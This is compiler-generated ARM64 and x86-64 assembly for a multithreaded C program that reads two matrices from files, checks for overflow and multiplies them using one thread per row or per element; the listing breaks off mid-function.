ldr x8, [sp, #56]
ldr x9, [sp, #72]
subs x8, x8, x9
mov x9, sp
str x8, [x9]
bl _printf
ldr x0, [sp, #40] ; 8-byte Folded Reload
ldr w8, [sp, #64]
ldr w9, [sp, #80]
subs w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
bl _printf
ldur x0, [x29, #-64]
ldur x1, [x29, #-40]
bl _write_output
ldur x0, [x29, #-48]
bl _free
ldur x0, [x29, #-56]
bl _free
ldur x0, [x29, #-64]
bl _free
mov w0, #0
ldp x29, x30, [sp, #160] ; 16-byte Folded Reload
add sp, sp, #176
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "r"
l_.str.1: ; @.str.1
.asciz "Cannot open one of the files\n"
l_.str.2: ; @.str.2
.asciz "row=%d col=%d\n"
l_.str.3: ; @.str.3
.asciz "Cannot get row or column number\n"
.comm _a_row,4,2 ; @a_row
.comm _a_col,4,2 ; @a_col
.comm _b_row,4,2 ; @b_row
.comm _b_col,4,2 ; @b_col
l_.str.4: ; @.str.4
.asciz "1st matrix column size doesn't match 2nd matrix row size\n"
l_.str.5: ; @.str.5
.asciz " \n\t"
l_.str.6: ; @.str.6
.asciz "Wrong number of elements in row %d\n"
l_.str.7: ; @.str.7
.asciz "Element at row %d column %d is not numeric only\n"
l_.str.8: ; @.str.8
.asciz "Element size is greater than int at row %d column %d\n"
l_.str.9: ; @.str.9
.asciz "Cannot read matrix elements\n"
l_.str.10: ; @.str.10
.asciz "Overflow will occur while computing element at row %d column %d\n"
l_.str.11: ; @.str.11
.asciz "ERROR; return code from pthread_create() is %d\n"
l_.str.12: ; @.str.12
.asciz "ERROR; return code from pthread_join() is %d\n"
l_.str.13: ; @.str.13
.asciz "Thread for each row method: \nNumber of threads: %d\n"
l_.str.14: ; @.str.14
.asciz "Thread for each element method: \nNumber of threads: %d\n"
l_.str.15: ; @.str.15
.asciz "w"
l_.str.16: ; @.str.16
.asciz "%d\t"
l_.str.17: ; @.str.17
.asciz "%d\n"
l_.str.18: ; @.str.18
.asciz "%d "
l_.str.19: ; @.str.19
.asciz "\n"
l_.str.20: ; @.str.20
.asciz "a.txt"
l_.str.21: ; @.str.21
.asciz "b.txt"
l_.str.22: ; @.str.22
.asciz "c.out"
l_.str.23: ; @.str.23
.asciz "Too many arguments\n"
l_.str.24: ; @.str.24
.asciz "Seconds taken %lu\n"
l_.str.25: ; @.str.25
.asciz "Microseconds taken: %lu\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _read_file ## -- Begin function read_file
.p2align 4, 0x90
_read_file: ## @read_file
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movb %sil, %al
movq %rdi, -8(%rbp)
andb $1, %al
movb %al, -9(%rbp)
movq -8(%rbp), %rdi
leaq L_.str(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB0_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.1(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_2:
movq -24(%rbp), %rdi
leaq L_.str.2(%rip), %rsi
leaq -28(%rbp), %rdx
leaq -32(%rbp), %rcx
movb $0, %al
callq _fscanf
cmpl $2, %eax
je LBB0_4
## %bb.3:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.3(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_4:
testb $1, -9(%rbp)
jne LBB0_6
## %bb.5:
movl -28(%rbp), %ecx
movq _a_row@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movl -32(%rbp), %ecx
movq _a_col@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
jmp LBB0_9
LBB0_6:
movl -28(%rbp), %ecx
movq _b_row@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movl -32(%rbp), %ecx
movq _b_col@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq _a_col@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _b_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB0_8
## %bb.7:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.4(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_8:
jmp LBB0_9
LBB0_9:
movslq -28(%rbp), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -40(%rbp)
movl $0, -44(%rbp)
LBB0_10: ## =>This Inner Loop Header: Depth=1
movl -44(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB0_13
## %bb.11: ## in Loop: Header=BB0_10 Depth=1
movslq -32(%rbp), %rdi
shlq $2, %rdi
callq _malloc
movq %rax, %rdx
movq -40(%rbp), %rax
movslq -44(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
## %bb.12: ## in Loop: Header=BB0_10 Depth=1
movl -44(%rbp), %eax
addl $1, %eax
movl %eax, -44(%rbp)
jmp LBB0_10
LBB0_13:
movq $0, -56(%rbp)
leaq L_.str.5(%rip), %rax
movq %rax, -64(%rbp)
movq $0, -72(%rbp)
movl $0, -84(%rbp)
LBB0_14: ## =>This Loop Header: Depth=1
## Child Loop BB0_17 Depth 2
## Child Loop BB0_24 Depth 3
movl -84(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB0_37
## %bb.15: ## in Loop: Header=BB0_14 Depth=1
movq -24(%rbp), %rdx
leaq -56(%rbp), %rdi
leaq -72(%rbp), %rsi
callq _getline
cmpq $-1, %rax
je LBB0_34
## %bb.16: ## in Loop: Header=BB0_14 Depth=1
movq -56(%rbp), %rdi
movq -64(%rbp), %rsi
callq _strtok
movq %rax, -80(%rbp)
movl $0, -88(%rbp)
LBB0_17: ## Parent Loop BB0_14 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_24 Depth 3
movl -88(%rbp), %eax
cmpl -32(%rbp), %eax
jge LBB0_33
## %bb.18: ## in Loop: Header=BB0_17 Depth=2
cmpq $0, -80(%rbp)
jne LBB0_20
## %bb.19:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -84(%rbp), %edx
incl %edx
leaq L_.str.6(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_20: ## in Loop: Header=BB0_17 Depth=2
movq -80(%rbp), %rax
movsbl (%rax), %eax
cmpl $45, %eax
sete %al
andb $1, %al
movb %al, -89(%rbp)
testb $1, -89(%rbp)
je LBB0_23
## %bb.21: ## in Loop: Header=BB0_17 Depth=2
movq -80(%rbp), %rdi
callq _strlen
cmpq $1, %rax
jne LBB0_23
## %bb.22:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -84(%rbp), %edx
incl %edx
movl -88(%rbp), %ecx
incl %ecx
leaq L_.str.7(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_23: ## in Loop: Header=BB0_17 Depth=2
movb -89(%rbp), %al
andb $1, %al
movzbl %al, %eax
movl %eax, -96(%rbp)
LBB0_24: ## Parent Loop BB0_14 Depth=1
## Parent Loop BB0_17 Depth=2
## => This Inner Loop Header: Depth=3
movslq -96(%rbp), %rax
movq %rax, -112(%rbp) ## 8-byte Spill
movq -80(%rbp), %rdi
callq _strlen
movq %rax, %rcx
movq -112(%rbp), %rax ## 8-byte Reload
cmpq %rcx, %rax
jae LBB0_29
## %bb.25: ## in Loop: Header=BB0_24 Depth=3
movq -80(%rbp), %rax
movslq -96(%rbp), %rcx
movsbl (%rax,%rcx), %edi
callq _isdigit
cmpl $0, %eax
jne LBB0_27
## %bb.26:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -84(%rbp), %edx
incl %edx
movl -88(%rbp), %ecx
incl %ecx
leaq L_.str.7(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_27: ## in Loop: Header=BB0_24 Depth=3
jmp LBB0_28
LBB0_28: ## in Loop: Header=BB0_24 Depth=3
movl -96(%rbp), %eax
addl $1, %eax
movl %eax, -96(%rbp)
jmp LBB0_24
LBB0_29: ## in Loop: Header=BB0_17 Depth=2
movl $10, -100(%rbp)
movl -96(%rbp), %eax
cmpl -100(%rbp), %eax
jle LBB0_31
## %bb.30:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -84(%rbp), %edx
incl %edx
movl -88(%rbp), %ecx
incl %ecx
leaq L_.str.8(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_31: ## in Loop: Header=BB0_17 Depth=2
movq -80(%rbp), %rdi
callq _atoi
movl %eax, %edx
movq -40(%rbp), %rax
movslq -84(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -88(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
movq -64(%rbp), %rsi
xorl %eax, %eax
movl %eax, %edi
callq _strtok
movq %rax, -80(%rbp)
## %bb.32: ## in Loop: Header=BB0_17 Depth=2
movl -88(%rbp), %eax
addl $1, %eax
movl %eax, -88(%rbp)
jmp LBB0_17
LBB0_33: ## in Loop: Header=BB0_14 Depth=1
jmp LBB0_35
LBB0_34:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.9(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_35: ## in Loop: Header=BB0_14 Depth=1
jmp LBB0_36
LBB0_36: ## in Loop: Header=BB0_14 Depth=1
movl -84(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
jmp LBB0_14
LBB0_37:
movq -24(%rbp), %rdi
callq _fclose
movq -40(%rbp), %rax
addq $112, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _mult_overflow ## -- Begin function mult_overflow
.p2align 4, 0x90
_mult_overflow: ## @mult_overflow
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl %edx, -12(%rbp)
movl %ecx, -16(%rbp)
movl -4(%rbp), %eax
imull -8(%rbp), %eax
movl %eax, -20(%rbp)
cmpl $0, -4(%rbp)
je LBB1_3
## %bb.1:
movl -20(%rbp), %eax
cltd
idivl -4(%rbp)
cmpl -8(%rbp), %eax
je LBB1_3
## %bb.2:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -12(%rbp), %edx
incl %edx
movl -16(%rbp), %ecx
incl %ecx
leaq L_.str.10(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB1_3:
movl -20(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _add_overflow ## -- Begin function add_overflow
.p2align 4, 0x90
_add_overflow: ## @add_overflow
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl %edx, -12(%rbp)
movl %ecx, -16(%rbp)
cmpl $0, -4(%rbp)
jl LBB2_4
## %bb.1:
movl $2147483647, %eax ## imm = 0x7FFFFFFF
subl -4(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB2_3
## %bb.2:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -12(%rbp), %edx
incl %edx
movl -16(%rbp), %ecx
incl %ecx
leaq L_.str.10(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB2_3:
jmp LBB2_7
LBB2_4:
movl -8(%rbp), %eax
movl $2147483648, %ecx ## imm = 0x80000000
subl -4(%rbp), %ecx
cmpl %ecx, %eax
jge LBB2_6
## %bb.5:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -12(%rbp), %edx
incl %edx
movl -16(%rbp), %ecx
incl %ecx
leaq L_.str.10(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB2_6:
jmp LBB2_7
LBB2_7:
movl -4(%rbp), %eax
addl -8(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _compute ## -- Begin function compute
.p2align 4, 0x90
_compute: ## @compute
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movl $0, -28(%rbp)
LBB3_1: ## =>This Loop Header: Depth=1
## Child Loop BB3_3 Depth 2
## Child Loop BB3_5 Depth 3
movl -28(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB3_12
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movl $0, -32(%rbp)
LBB3_3: ## Parent Loop BB3_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB3_5 Depth 3
movl -32(%rbp), %eax
movq _b_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB3_10
## %bb.4: ## in Loop: Header=BB3_3 Depth=2
movq -24(%rbp), %rax
movslq -28(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -32(%rbp), %rcx
movl $0, (%rax,%rcx,4)
movl $0, -36(%rbp)
LBB3_5: ## Parent Loop BB3_1 Depth=1
## Parent Loop BB3_3 Depth=2
## => This Inner Loop Header: Depth=3
movl -36(%rbp), %eax
movq _a_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB3_8
## %bb.6: ## in Loop: Header=BB3_5 Depth=3
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -36(%rbp), %rcx
movl (%rax,%rcx,4), %edx
movq -16(%rbp), %rax
movslq -36(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -32(%rbp), %rcx
imull (%rax,%rcx,4), %edx
movq -24(%rbp), %rax
movslq -28(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -32(%rbp), %rcx
addl (%rax,%rcx,4), %edx
movl %edx, (%rax,%rcx,4)
## %bb.7: ## in Loop: Header=BB3_5 Depth=3
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB3_5
LBB3_8: ## in Loop: Header=BB3_3 Depth=2
jmp LBB3_9
LBB3_9: ## in Loop: Header=BB3_3 Depth=2
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB3_3
LBB3_10: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_11
LBB3_11: ## in Loop: Header=BB3_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB3_1
LBB3_12:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _compute_for_row ## -- Begin function compute_for_row
.p2align 4, 0x90
_compute_for_row: ## @compute_for_row
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq %rax, -16(%rbp)
movq -16(%rbp), %rax
movl 24(%rax), %eax
movl %eax, -20(%rbp)
movq -16(%rbp), %rax
movq (%rax), %rax
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -48(%rbp)
LBB4_1: ## =>This Loop Header: Depth=1
## Child Loop BB4_3 Depth 2
## Child Loop BB4_5 Depth 3
movl -20(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB4_12
## %bb.2: ## in Loop: Header=BB4_1 Depth=1
movl $0, -52(%rbp)
LBB4_3: ## Parent Loop BB4_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB4_5 Depth 3
movl -52(%rbp), %eax
movq _b_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB4_10
## %bb.4: ## in Loop: Header=BB4_3 Depth=2
movq -48(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -52(%rbp), %rcx
movl $0, (%rax,%rcx,4)
movl $0, -56(%rbp)
LBB4_5: ## Parent Loop BB4_1 Depth=1
## Parent Loop BB4_3 Depth=2
## => This Inner Loop Header: Depth=3
movl -56(%rbp), %eax
movq _a_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB4_8
## %bb.6: ## in Loop: Header=BB4_5 Depth=3
movq -32(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -56(%rbp), %rcx
movl (%rax,%rcx,4), %edi
movq -40(%rbp), %rax
movslq -56(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -52(%rbp), %rcx
movl (%rax,%rcx,4), %esi
movl -20(%rbp), %edx
movl -52(%rbp), %ecx
callq _mult_overflow
movl %eax, -60(%rbp)
movq -48(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -52(%rbp), %rcx
movl (%rax,%rcx,4), %edi
movl -60(%rbp), %esi
movl -20(%rbp), %edx
movl -52(%rbp), %ecx
callq _add_overflow
movl %eax, %edx
movq -48(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -52(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
## %bb.7: ## in Loop: Header=BB4_5 Depth=3
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB4_5
LBB4_8: ## in Loop: Header=BB4_3 Depth=2
jmp LBB4_9
LBB4_9: ## in Loop: Header=BB4_3 Depth=2
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB4_3
LBB4_10: ## in Loop: Header=BB4_1 Depth=1
jmp LBB4_11
LBB4_11: ## in Loop: Header=BB4_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB4_1
LBB4_12:
xorl %eax, %eax
movl %eax, %edi
callq _pthread_exit
.cfi_endproc
## -- End function
.globl _compute_for_element ## -- Begin function compute_for_element
.p2align 4, 0x90
_compute_for_element: ## @compute_for_element
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq %rax, -16(%rbp)
movq -16(%rbp), %rax
movl 24(%rax), %eax
movl %eax, -20(%rbp)
movq -16(%rbp), %rax
movl 28(%rax), %eax
movl %eax, -24(%rbp)
movq -16(%rbp), %rax
movq (%rax), %rax
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -24(%rbp), %rcx
movl $0, (%rax,%rcx,4)
movl $0, -52(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
movq _a_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB5_4
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movq -32(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -52(%rbp), %rcx
movl (%rax,%rcx,4), %edi
movq -40(%rbp), %rax
movslq -52(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %esi
movl -20(%rbp), %edx
movl -24(%rbp), %ecx
callq _mult_overflow
movl %eax, -56(%rbp)
movq -48(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %edi
movl -56(%rbp), %esi
movl -20(%rbp), %edx
movl -24(%rbp), %ecx
callq _add_overflow
movl %eax, %edx
movq -48(%rbp), %rax
movslq -20(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -24(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
## %bb.3: ## in Loop: Header=BB5_1 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB5_1
LBB5_4:
xorl %eax, %eax
movl %eax, %edi
callq _pthread_exit
.cfi_endproc
## -- End function
.globl _thread_for_row ## -- Begin function thread_for_row
.p2align 4, 0x90
_thread_for_row: ## @thread_for_row
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq %rdx, -32(%rbp)
movq _a_row@GOTPCREL(%rip), %rax
movl (%rax), %eax
## kill: def $rax killed $eax
movq %rax, -88(%rbp) ## 8-byte Spill
movq %rsp, %rcx
movq %rcx, -40(%rbp)
shlq $3, %rax
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq -88(%rbp), %rax ## 8-byte Reload
movq %rsp, %rcx
movq %rcx, -80(%rbp) ## 8-byte Spill
movq %rax, -48(%rbp)
movl $0, -56(%rbp)
LBB6_1: ## =>This Inner Loop Header: Depth=1
movl -56(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB6_6
## %bb.2: ## in Loop: Header=BB6_1 Depth=1
movl $32, %edi
callq _malloc
movq -80(%rbp), %rdi ## 8-byte Reload
movq %rax, -64(%rbp)
movq -16(%rbp), %rcx
movq -64(%rbp), %rax
movq %rcx, (%rax)
movq -24(%rbp), %rcx
movq -64(%rbp), %rax
movq %rcx, 8(%rax)
movq -32(%rbp), %rcx
movq -64(%rbp), %rax
movq %rcx, 16(%rax)
movl -56(%rbp), %ecx
movq -64(%rbp), %rax
movl %ecx, 24(%rax)
movslq -56(%rbp), %rax
shlq $3, %rax
addq %rax, %rdi
movq -64(%rbp), %rcx
xorl %eax, %eax
movl %eax, %esi
leaq _compute_for_row(%rip), %rdx
callq _pthread_create
movl %eax, -52(%rbp)
cmpl $0, -52(%rbp)
je LBB6_4
## %bb.3:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -52(%rbp), %edx
leaq L_.str.11(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $-1, %edi
callq _exit
LBB6_4: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_5
LBB6_5: ## in Loop: Header=BB6_1 Depth=1
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB6_1
LBB6_6:
movl $0, -68(%rbp)
LBB6_7: ## =>This Inner Loop Header: Depth=1
movl -68(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB6_12
## %bb.8: ## in Loop: Header=BB6_7 Depth=1
movq -80(%rbp), %rax ## 8-byte Reload
movslq -68(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
xorl %eax, %eax
movl %eax, %esi
callq _pthread_join
cmpl $0, -52(%rbp)
je LBB6_10
## %bb.9:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -52(%rbp), %edx
leaq L_.str.12(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $-1, %edi
callq _exit
LBB6_10: ## in Loop: Header=BB6_7 Depth=1
jmp LBB6_11
LBB6_11: ## in Loop: Header=BB6_7 Depth=1
movl -68(%rbp), %eax
addl $1, %eax
movl %eax, -68(%rbp)
jmp LBB6_7
LBB6_12:
movq _a_row@GOTPCREL(%rip), %rax
movl (%rax), %esi
leaq L_.str.13(%rip), %rdi
movb $0, %al
callq _printf
movq -40(%rbp), %rax
movq %rax, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB6_14
## %bb.13:
movq %rbp, %rsp
popq %rbp
retq
LBB6_14:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _thread_for_element ## -- Begin function thread_for_element
.p2align 4, 0x90
_thread_for_element: ## @thread_for_element
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq %rdx, -32(%rbp)
movq _a_row@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _b_col@GOTPCREL(%rip), %rcx
movl (%rcx), %ecx
imull %ecx, %eax
## kill: def $rax killed $eax
movq %rax, -96(%rbp) ## 8-byte Spill
movq %rsp, %rcx
movq %rcx, -40(%rbp)
shlq $3, %rax
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq -96(%rbp), %rax ## 8-byte Reload
movq %rsp, %rcx
movq %rcx, -88(%rbp) ## 8-byte Spill
movq %rax, -48(%rbp)
movl $0, -56(%rbp)
LBB7_1: ## =>This Loop Header: Depth=1
## Child Loop BB7_3 Depth 2
movl -56(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB7_10
## %bb.2: ## in Loop: Header=BB7_1 Depth=1
movl $0, -60(%rbp)
LBB7_3: ## Parent Loop BB7_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -60(%rbp), %eax
movq _b_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB7_8
## %bb.4: ## in Loop: Header=BB7_3 Depth=2
movl $32, %edi
callq _malloc
movq -88(%rbp), %rdi ## 8-byte Reload
movq %rax, -72(%rbp)
movq -16(%rbp), %rcx
movq -72(%rbp), %rax
movq %rcx, (%rax)
movq -24(%rbp), %rcx
movq -72(%rbp), %rax
movq %rcx, 8(%rax)
movq -32(%rbp), %rcx
movq -72(%rbp), %rax
movq %rcx, 16(%rax)
movl -56(%rbp), %ecx
movq -72(%rbp), %rax
movl %ecx, 24(%rax)
movl -60(%rbp), %ecx
movq -72(%rbp), %rax
movl %ecx, 28(%rax)
movl -56(%rbp), %eax
movq _b_col@GOTPCREL(%rip), %rcx
imull (%rcx), %eax
addl -60(%rbp), %eax
cltq
shlq $3, %rax
addq %rax, %rdi
movq -72(%rbp), %rcx
xorl %eax, %eax
movl %eax, %esi
leaq _compute_for_element(%rip), %rdx
callq _pthread_create
movl %eax, -52(%rbp)
cmpl $0, -52(%rbp)
je LBB7_6
## %bb.5:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movl -52(%rbp), %edx
leaq L_.str.11(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $-1, %edi
callq _exit
LBB7_6: ## in Loop: Header=BB7_3 Depth=2
jmp LBB7_7
LBB7_7: ## in Loop: Header=BB7_3 Depth=2
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB7_3
LBB7_8: ## in Loop: Header=BB7_1 Depth=1
jmp LBB7_9
LBB7_9: ## in Loop: Header=BB7_1 Depth=1
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB7_1
LBB7_10:
movl $0, -76(%rbp)
LBB7_11: ## =>This Loop Header: Depth=1
## Child Loop BB7_13 Depth 2
movl -76(%rbp), %eax
movq _a_row@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB7_20
## %bb.12: ## in Loop: Header=BB7_11 Depth=1
movl $0, -80(%rbp)
LBB7_13: ## Parent Loop BB7_11 Depth=1
## => This Inner Loop Header: Depth=2
movl -80(%rbp), %eax
movq _b_col@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB7_18
## %bb.14: ## in Loop: Header=BB7_13 Depth=2
movq -88(%rbp), %rax ## 8-byte Reload
movl -76(%rbp), %ecx
movq _b_col@GOTPCREL(%rip), %rdx
imull (%rdx), %ecx
addl -80(%rbp), %ecx
movslq %ecx, %rcx
movq (%rax,%rcx,8), %rdi
xorl %eax, %eax
movl %eax, %esi
callq _pthread_join
